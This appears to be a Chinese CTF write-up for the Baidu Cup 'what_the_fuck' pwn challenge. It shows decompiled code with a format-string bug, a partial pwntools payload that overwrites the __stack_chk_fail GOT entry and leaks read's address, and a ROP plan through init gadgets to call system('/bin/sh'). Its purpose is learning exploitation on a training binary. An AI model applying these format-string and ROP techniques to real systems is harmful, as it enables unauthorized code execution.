对于这道题,我还真的想说 what_the_fuck !!

这道题拿到就只发觉一个格式化字符串漏洞,其他的就找不到了 。

 unsigned __int64 sub_4008C5()

 {

   char s; // [rsp+0h] [rbp-20h]

   unsigned __int64 v2; // [rsp+18h] [rbp-8h]

   v2 = __readfsqword(0x28u);

   printf("leave a msg: ");

   memset(&s, , 0x10uLL);

   read(, &s, 0x20uLL);

   if ( strstr(&s, "%p") || strstr(&s, "$p") )

   {

     puts("do you want to leak info?");

     exit();

   }

   printf(&s, "$p"); //漏洞所在

   return __readfsqword(0x28u) ^ v2;

 }

还是找了网上的wp 一边学,一边复现,这里总接下所学的。

看到这些这有一个格式化字符串漏洞,又开启了canary,可以先考虑覆盖__stack_chk_fail指向main,这样就可以利用溢出,无限往栈里写东西。

首先,在ida或者gdb调试中,把name和msg在栈中是第几个参数找出来,在64位的程序中,在64位的文件中,printf传参:现一般规则为, 当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。

 payload=l64(0x601020)                 

 fd.recvuntil('input your name: ')

 fd.send(payload)

 fd.recvuntil('leave a msg: ')

 payload='%.'+str(0x0983)+'d'+'%12$hn'+' %9$s%10$ld'

 payload+='\x00'*(0x18-len(payload))

 payload+=l64(0x601040)

用%.sum$n 往栈里的指针参数写东西时,sum代表的是sum+1个参数。

.got.plt: off_601020 dq offset __stack_chk_fail

got.plt: off_601040 dq offset read ; DATA XREF: _read↑r

%9$s%10$ld  这里输出了第一次main函数的ebp,还有read函数的地址

然后可以构建一个leak函数,利用pwn的DynELF()找出system函数。这些题目给有给出libc的时候可以考虑下。

这样就知道system和read的地址了,接下来就是构建栈的结构,执行read(0,addr,size)  写入/bin/sh +'\x00'+system, 然后system(/bin/sh)开启shell,关于read的参数 可以利用init里面的

 text:0000000000400A60 loc_400A60:                             ; CODE XREF: init+↓j

 .text:0000000000400A60                 mov     rdx, r13

 .text:0000000000400A63                 mov     rsi, r14

 .text:0000000000400A66                 mov     edi, r15d

 .text:0000000000400A69                 call    qword ptr [r12+rbx*]

 .text:0000000000400A6D                 add     rbx,

 .text:0000000000400A71                 cmp     rbx, rbp

 .text:0000000000400A74                 jnz     short loc_400A60

 .text:0000000000400A76

 .text:0000000000400A76 loc_400A76:                             ; CODE XREF: init+↑j

 .text:0000000000400A76                 add     rsp,

 .text:0000000000400A7A                 pop     rbx

 .text:0000000000400A7B                 pop     rbp

 .text:0000000000400A7C                 pop     r12

 .text:0000000000400A7E                 pop     r13

 .text:0000000000400A80                 pop     r14

 .text:0000000000400A82                 pop     r15

 .text:0000000000400A84                 retn

 .text:0000000000400A84 ; } // starts at 400A20

接下来就是构建栈,

首先在第二次就开始布局,这里就不多说了 https://www.cnblogs.com/shangye/p/6209008.html   这个大佬里面很详细。

下面我只讲一些 在理解的时候出现的问题,就是在执行call的时候会把rip push 进栈中。就是忘了 这个,,搞了大半天。一个个参数调试,烦死了

百度杯 十二月 what_the_fuck的更多相关文章

  1. ctf百度杯十二月场what_the_fuck(一口盐汽水提供的答案)

    目录 漏洞利用原理 具体利用步骤 漏洞利用原理 read(, &s, 0x20uLL); if ( strstr(&s, "%p") || strstr(& ...

  2. “百度杯”CTF比赛 十二月场_blog(kindeditor编辑器遍历,insert注入,文件包含)

    题目在i春秋的ctf训练营中能找到 首先先是一个用户登录与注册界面,一般有注册界面的都是要先让你注册一波,然后找惊喜的 那我就顺着他的意思去注册一个号 注册了一个123用户登录进来看到有个文本编辑器, ...

  3. 2017 百度杯丶二月场第一周WP

    1.祸起北荒 题目: 亿万年前 天子之子华夜,被父神之神末渊上神告知六荒十海之北荒西二旗即将发生一场"百度杯"的诸神之战 他作为天族的太子必须参与到此次诸神之战定六荒十海 华夜临危 ...

  4. “百度杯”CTF比赛 2017 二月场(Misc Web)

    爆破-1: 打开链接,是502 我直接在后面加个变量传参数:?a=1 出了一段代码 var_dump()函数中,用了$$a,可能用了超全局变量GLOBALS 给hello参数传个GLOBALS 得到f ...

  5. 十一月百度杯pwnme 详细wp

    目录 程序基本信息 程序溢出点 整体思路 exp脚本 成功获得flag 参考 程序基本信息 可以看到开启了栈不可执行和got表不可写保护. 程序溢出点 在函数sub_400AF7中,v8可以读入0x1 ...

  6. [i春秋]“百度杯”CTF比赛 十月场-Hash

    前言 涉及知识点:反序列化.代码执行.命令执行 题目来自:i春秋 hash  如果i春秋题目有问题可以登录榆林学院信息安全协会CTF平台使用 或者利用本文章提供的源码自主复现 [i春秋]"百 ...

  7. "百度杯"CTF比赛 十月场——EXEC

    "百度杯"CTF比赛 十月场--EXEC 进入网站页面 查看源码 发现了vim,可能是vim泄露,于是在url地址输入了http://21b854b211034489a4ee1cb ...

  8. “百度杯”CTF比赛 九月场_YeserCMS

    题目在i春秋ctf大本营 题目的提示并没有什么卵用,打开链接发现其实是easycms,百度可以查到许多通用漏洞 这里我利用的是无限报错注入 访问url/celive/live/header.php,直 ...

  9. “百度杯”CTF比赛 2017 二月场_onthink

    题目在i春秋ctf训练营中能找到,这题直接拿大佬的wp来充数 百度找到onethinnk的一个漏洞. 参考:http://www.hackdig.com/06/hack-36510.htm 就是注册个 ...

随机推荐

  1. Django之多对多表之through第三张表之InlineModelAdmin后台内嵌

    话不多说,来看表结构 这里有两个表,一个是阶段表,一个是老师表,一个老师可以带多个阶段,一个阶段也可以由多个老师带,所以是多对多关系 # 阶段表 class Stage(models.Model): ...

  2. Redis(十)集群:Redis Cluster

    一.数据分布 1.数据分布理论 2.Redis数据分区 Redis Cluser采用虚拟槽分区,所有的键根据哈希函数映射到0~16383整数槽内,计算公式:slot=CRC16(key)&16 ...

  3. 向现有URL末尾添加查询字符串参数

    向现有URL末尾添加查询字符串参数 xhr.open("get", "example.php?name1=value1&name2=value2", t ...

  4. vue 列表的排序过渡 shuffle遇到的问题

    内部的实现,Vue 使用了一个叫 FLIP 简单的动画队列使用 transforms 将元素从之前的位置平滑过渡新的位置 需要注意的是使用 FLIP 过渡的元素不能设置为 display: inlin ...

  5. MongoDB分页查询优化方法

    在网上看到很多关于MongoDB分页查询优化的文章,如出一辙.笔者自己实际生产中也遇到此问题,所以看了很多篇文章,这里分享一篇简明扼要的文章分享给大家,希望对大家在使用MongoDB时有所帮助. 凡事 ...

  6. MongoDB Java API操作很全的整理

    MongoDB 是一个基于分布式文件存储的数据库.由 C++ 语言编写,一般生产上建议以共享分片的形式来部署. 但是MongoDB官方也提供了其它语言的客户端操作API.如下图所示: 提供了C.C++ ...

  7. kaldi中CD-DNN-HMM网络参数更新公式手写推导

    在基于DNN-HMM的语音识别中,DNN的作用跟GMM是一样的,即它是取代GMM的,具体作用是算特征值对每个三音素状态的概率,算出来哪个最大这个特征值就对应哪个状态.只不过以前是用GMM算的,现在用D ...

  8. 超融合与传统IT架构对比:成本价格优势有哪些

    之前文章中,我们已经介绍了超融合给用户 IT 基础架构带来的各个方面的价值,其中成本只是超融合架构的优势之一.但很多用户还是会非常关心这个话题,希望能有更具体的了解,所以本文整理超融合和传统 FC S ...

  9. Linux 下的 redis安装

    官网下载链接:https://redis.io/download redis安装流程,记录自己的实践,分享给需要的人. 1.选择Stable(5.0)下的Download 5.0.0 链接进行下载 ( ...

  10. CSPS模拟 96

    我菜的一批. 反省一下,我只能在简单场考的好的原因. 过分依赖灵感,不注意积累思路历程和各种套路.没灵感直接崩了 懒得打暴力,主要还是代码能力限制,打暴力真的很费时费力 不打对拍,这个emmm和第二条 ...